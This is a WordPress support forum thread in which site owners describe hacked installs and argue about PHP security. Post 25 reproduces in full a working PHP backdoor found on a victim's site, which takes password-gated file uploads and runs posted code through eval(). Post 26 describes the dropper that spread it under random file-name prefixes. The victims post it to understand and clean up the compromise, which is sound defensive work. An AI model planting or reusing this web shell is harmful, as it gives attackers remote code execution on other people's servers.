WordPress.org

Ready to get started?Download WordPress

Forums

got hacked (58 posts)

  1. Ivovic
    Member
    Posted 6 years ago #

    I feel parasites squirming around my intestines just thinking about it... I think that's a sign! ;)

    If I thought there was a legitimate credit card transaction among them, I'd seriously consider it.

    edit: if by chance you're not totally joking, I'm curious :)

  2. whooami
    Member
    Posted 6 years ago #

    hahahahhah

  3. Ivovic
    Member
    Posted 6 years ago #

    btw, I just realised you finally made it to a dogpile thread... nice going!

  4. elorgwhee
    Member
    Posted 6 years ago #

    I've been keeping up with the upgrades, and read through the security info that was posted and implemented everything that I could to keep things relatively secure. I'm more than just savvy and try to be conscious of possible security issues. I have a test environment at home where I test plugins, themes and upgrades, etc. Though I can't rule out that it wasn't my fault, nor the fact that I'm on a shared server. In moving to a new server, I'm installing everything clean and changing all passwords, etc. - but I'm not finished with the setup yet so I have to deal with this issue until I am.

    I would like to think that just because there's at least one person in this thread who was affected by this that doesn't seem to have much of a clue and is a bit obnoxious about asking for help, that you aren't assuming that everyone affected by this is a complete idiot.

  5. whooami
    Member
    Posted 6 years ago #

    elorgwhee,

    I would like to think that just because there's at least one person in this thread who was affected by this that doesn't seem to have much of a clue and is a bit obnoxious about asking for help, that you aren't assuming that everyone affected by this is a complete idiot.

    I dont assume anything of a kind, and dont mean to diminish the seriousness of any site being hacked. We spend quite a bit of time on these forums, so brevity helps. It is true though, about about the unwashed masses though. :)

  6. clarkeian
    Member
    Posted 6 years ago #

    Ivovic wrote:

    "easy to build websites with hard to find vulnerabilities"

    I'm surprised the universe didn't implode when you said that. If it's easy to build... then surely it's easier to find the vulnerabilities than if it were HARD to build with it, right?

    Wrong, easy to build does not imply that it's easy to find vulnerabilities.

    PHP gives you lots of little shortcuts which make it easier to get the functionality you want, but often they also make it easier to do it in a way that allows malicious code-injection.

    What's your point anyway? You want something absolutely bug-free? Sorry it doesn't exist.

    Not bug-free, exploit free. There is plenty of software on my server that has never allowed my server to be compromised. PHP has allowed my server to be compromised at least twice!

    The more popular something becomes, the bigger a target it is. You chose wordpress because everyone thinks it's great. That's the same reason the hackers are after it.

    Hackers are after it due to the combination of its popularity, and its insecurity. There is plenty of popular and secure software out there.

    Trade ease of use, compatibility and extensibility for obscurity, then we'll see you on their forum complaining that they don't have as many nice features as wordpress.

    Useful features and security are not mutually exclusive, that is a lame cop-out. There are plenty of software platforms that are both featureful, popular, and secure. Perhaps if you spent more time away from PHP you'd see that.

  7. Joni
    Member
    Posted 6 years ago #

    There are plenty of software platforms that are both featureful, popular, and secure.

    Okay, I'll bite. Name a few. (And please understand: I'm NOT trying to be contentious here. I am actually quite curious to know your response.)

  8. Ivovic
    Member
    Posted 6 years ago #

    Whoo's on first...

    assuming that everyone affected by this is a complete idiot.

    Of course not... A lot of what I've posted here addresses concerns which are largely out of your control. There's no way you can possibly check every line of code for security issues yourself, so at some point you have to trust.

    I love plugin developers because they're the life of the wordpress community, but I advocate suspicion, because they're often just hacks like me trying to cobble a solution together. Regardless of that, no amount of suspicion or research will ever guarantee your safety.

    My first post in this thread addressed the issue as seriously as possible with the only course of action available to you right now, which is mopping up aisle 2... and hoping it's not your favourite plugin that has the issue.

    ... the rest of this thread relates to some senseless emotional whining from someone who definitely has *not* been responsible... and the ensuing coping mechanisms we have for that.

    Don't feel herded into a group you know you're not a part of. That distinction is obvious to anyone whose opinion counts for anything.

  9. clarkeian
    Member
    Posted 6 years ago #

    Okay, I'll bite. Name a few. (And please understand: I'm NOT trying to be contentious here. I am actually quite curious to know your response.)

    Exploits in Java code are rare, because Java frameworks tend to enforce good security practices (such as maintaining separation between data and code, and automatically escaping strings - something you have to do manually in PHP).

    Getting specific, one Java-based framework I have personal familiarity with is Apache Wicket - and I'm not aware of a single successful exploit of a Wicket-based website.

    Of course, you can write insecure code in any language, the difference is that in Java-based frameworks you really have to do something dumb, but in PHP the obvious way to do many things is insecure by default.

    When an exploit is found in most software packages, it is a genuinely rare thing that people react strongly to. It seems that when an exploit is found in WordPress, it just results in another "ho-hum" point release.

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects. Its depressing that expectations are so low around here :-(

  10. Ivovic
    Member
    Posted 6 years ago #

    Wrong, easy to build does not imply that it's easy to find vulnerabilities.

    Bzzzt... sorry, but that's a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

    It's completely logical that something simpler to understand is automatically simpler to keep track of.

    Useful features and security are not mutually exclusive

    You're arguing against my words, not against the spirit of what I was saying. That's a tired old forum tactic that I don't plan to indulge.

    Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That's true in all concievable cases.

    Take your finest example, add another feature, and you've increased the likelihood that it will have a bug (and that the bug may be an exploit).

    Not bug-free, exploit free.

    In the conversational sense, exploits are just a kind of bug.

    There is plenty of software on my server that has never allowed my server to be compromised.

    That doesn't mean the exploits aren't there. I've never seen under your mattress, but that doesn't mean your sticky copy of equine weekly is a secret.

  11. Ivovic
    Member
    Posted 6 years ago #

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects

    This I agree with... but not because it's wordpress. This is an increasing phenomenon.

    I've found the prevailing attitude to be quite poor, and the official response from people like Matt that folks should just upgrade and stop whining is less than satisfactory.

    That doesn't change anything though... and it certainly doesn't explain your choice to keep using wordpress.

    Find yourself a java-based publishing platform and use it, maybe...

    I've used wordpress since the 1.5s and I've never had my wordpress hacked... so perhaps I'm not fed up yet. When I am fed up, you'll know it because I won't be here anymore.

  12. Joni
    Member
    Posted 6 years ago #

    WordPress users seem to simply accept these critical vulnerabilities that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

    Try substituting the word Microsoft or Windows for WordPress in the above statement and you'll find it's true there as well. :)

  13. Ivovic
    Member
    Posted 6 years ago #

    before we get stuck into windows and ms-bashing, lets take a moment to research the actual statistics for security vulnerabilities in linux vs windows (and firefox vs IE) over the last 8 years.

    I think its high time we got over windows98 and started addressing the reality.

  14. whooami
    Member
    Posted 6 years ago #

    ..that would be a huge scandal meriting a grovelling apology from those responsible in other software projects.

    Spend some time using phpBB. Most developers of free open-source PHP projects have a similar response.

  15. clarkeian
    Member
    Posted 6 years ago #

    Ivovic wrote:

    Bzzzt... sorry, but that's a load of crap. Those same shortcuts you speak of, make code easier to follow, and hence easier to debug.

    Dude, you don't know what you are talking about. These ugly kludges may make it easier to write insecure code, but often there is an inverse relationship between ease of writing and ease of reading, just look at Perl. PHP is a horribly designed language, it encourages insecure coding practices, and they don't even bother to keep the API stable from release to release. In short, PHP is a mess of a programming language.

    You're arguing against my words, not against the spirit of what I was saying.

    Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

    That's a tired old forum tactic that I don't plan to indulge.

    A tired old forum tactic called "rational debate".

    Having said that, it (again) holds true that the more code you add, the more likely it is that something will go wrong. That's true in all concievable cases.

    That is only true if you assume that all code is equal, but it isn't. 10 lines of secure code is better than 1 line of insecure code.

    In the conversational sense, exploits are just a kind of bug.

    Yes, and...? If A is a kind of B, that doesn't mean that A is the same as B.

    That doesn't mean the exploits aren't there. I've never seen under your mattress, but that doesn't mean your sticky copy of equine weekly is a secret.

    Now you are just rambling incoherently. Of course there could be unknown exploits in non-PHP apps on my server, the point is that there are two known exploits in the PHP apps, in addition to all the unknown exploits there might be.

  16. elorgwhee
    Member
    Posted 6 years ago #

    Thanks whooami & Ivovic.

    Between work, I'm still trying to clean this up enough to make it through another week of finishing the testing/configuration on the new server. It traversed my directories and got literally hundreds of files (thousands maybe?). Scripting the cleanup would be a heck of a lot easier, but I'm not confident in my scripting abilities and friends are helping where they can (when they have time). Meanwhile, it's all manual.
    >_<

  17. Ivovic
    Member
    Posted 6 years ago #

    Are you kidding? You are seriously saying that I should ignore what you actually say and try to imagine what you are thinking instead?

    yes, actually I am, because that's what communication is. If I were to intentionally nit-pick everything you've written looking for double-meanings and unintended loopholes to exploit, we'd be here all day error-checking our writing instead of getting on with business.

    Come to think of it, it's now painfully obvious why you're being such an insufferable pain in the ass about all this. Unfortunately you're also being hypocritical because your language suffers the same lack of accuracy mine does (only you seem proud of it).

    case in point:

    Yes, and...? If A is a kind of B, that doesn't mean that A is the same as B.

    Actually, it means that B *is* the same as A, for the broader definition that A brings with it. Get it right.

    If you have a basket of apples, and one of them is red... they're all still apples. Even the red one.

    Please, nit-picking is for apes... I have no interest in it, so why not just go fix your busted wordpress as this discussion certainly isn't going to do it.

  18. Ivovic
    Member
    Posted 6 years ago #

    elorgwhee, consider taking your media off the server (that is, only the media files in your uploads directory structure), then just rm -rf the whole lot.

    ... you likely have a local copy of your theme already, and you'll have to reload plugins and such anyway...

    just a thought.

  19. elorgwhee
    Member
    Posted 6 years ago #

    Yeah, I've considered that. It's really tempting. But I have a bit of custom code that was affected as well - so there's no reinstalling it. I'd have to hope that my latest backup captured any of my recent updates to it.

    Maybe I'll just do that for wordpress and vanilla for now so at least those parts don't continue to crash people's computers. lol

    Or maybe I can just cut over to the new site without any templates or plugins. It won't be pretty, but it would work for now.. *rubs chin*

  20. Ivovic
    Member
    Posted 6 years ago #

    as one moon-face to another, I implore you to reconsider any prolonged chin-abrasion :)

    edit: I apologise, I just realised that it's only me who finds myself funny when I haven't had any sleep.... and with that, I'm out ;)

    good luck with the recovery.

  21. clarkeian
    Member
    Posted 6 years ago #

    Ivovic,

    I notice that you have now completely dropped the substantive argument about PHP's security, and are trying to change the subject to some meta-rhetorical waffle. This doesn't really surprise me, changing the subject is a common (if rather lame) way to avoid losing a debate.

    Even though I think your meta-rhetorical waffle is at least as specious as your opinions on programming language security, I came here to discuss the former, not the latter.

    Since you've dropped the subject I'm interested in, I think we are done.

  22. ClaytonJames
    Member
    Posted 6 years ago #

    I'll get the light...

    (click)

  23. martypants
    Member
    Posted 6 years ago #

    I got hacked, too. I just joined this site, and before I get flamed for being another guy who joined only when he got hacked, let me say its because I've been a happy camper with WordPress for almost 2 years. It's done everything I asked and easily enough, so I just had no reason to search for more things to read. Sorry.

    Every one of my php and htm files got hacked with the script zikzak shows.
    How can I prevent it again?
    How can I fix my broken blogs? (can I just point to the still-good sql from a new installation and throw away the code in the old?) How would I do this?
    How do I punish the fuckers who did this? I want thumb screws and cat-o-nine-tails

    Thanks ever so much,
    Martin

  24. Flecko
    Member
    Posted 6 years ago #

    My site was hacked as well. Any chance this thread can re-evolve from bickering to helping everyone figure out the cause?

    I have the affected script attached to all my files...and although I didn't find anything tagged with pre_ in front of the filename, I did find that hello.php in my plugins directory was copied to ext_hello.php with some funky code in it.

    I have no idea how these guys got in, or how they destroyed my site. Any chance anyone has any ideas before I wipe it and start all over?

    Thanks everyone.

  25. Cugel
    Member
    Posted 6 years ago #

    I also got hacked and I had some custom code that wasn't backed-up recently, so I have find the infected bits and clean it out.

    I have started comparing the hacked website with backup copies using a folder compare application. Then I compare any suspect files using an app for finding text differences. So far I have only found the code already posted here and a directory with 71 casino html-pages.

    In my case they used lib_ as a prefix on the files containing this:

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','c1717aa0da396794f1a340b2ee7678c2');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>

    Could someone please explain what this code is supposed to do?

  26. Cugel
    Member
    Posted 6 years ago #

    The code responsible for traversing directories and creating files containing the code mentioned above seems to reside in a file named wp-stats.php in the top level of the WordPress install. (If I am not mistaken – I am not a php-programmer)

    It randomly chooses a string to prepend to an existing filename. Prefixes used are 'lib_', 'co_', 'pre_', 'net_', 'func_', 'ad_', 'ext_', 'new_', 'old_', 'fix_', 'fixed_', 'na_', 'av_' and 'fx_'.

    There are some password related functions also.

  27. jbiethan
    Member
    Posted 6 years ago #

    Well we're all learning.
    We just put up a VPS server to control 1 issue of being hosted with other WP blogs that aren't keeping current and not using security measures.

    Now we're cleaning a few sites and need some help.

    We have a WordPress MYSQL database that appears to have
    had a SQL injection. We're attempting to clean the file and have
    a few questions.

    1) Are there any tools available that can scan a
    backup of a MySQL table exported from phpMyAdmin
    and clean out a SQL Injection?

    2) Are there any tools available that can scan an online MySQL
    database and clean out a SQL Injection?

    3) Are there any tools that can detect any other problems
    in regards to a WordPress installation that has been compromised?

    We're new to this cleanup process and any help at all in
    locating any tools would be greatly appreciated.

  28. Mobster
    Member
    Posted 6 years ago #

    Has anyone come up with a solution to this? I had this very thing happen to me recently. It seems there are allot of threads like this that go unanswered.

    My files all began with fx_

    How should I check my database to make sure none of this is polluting that as well?

Topic Closed

This topic has been closed to new replies.

About this Topic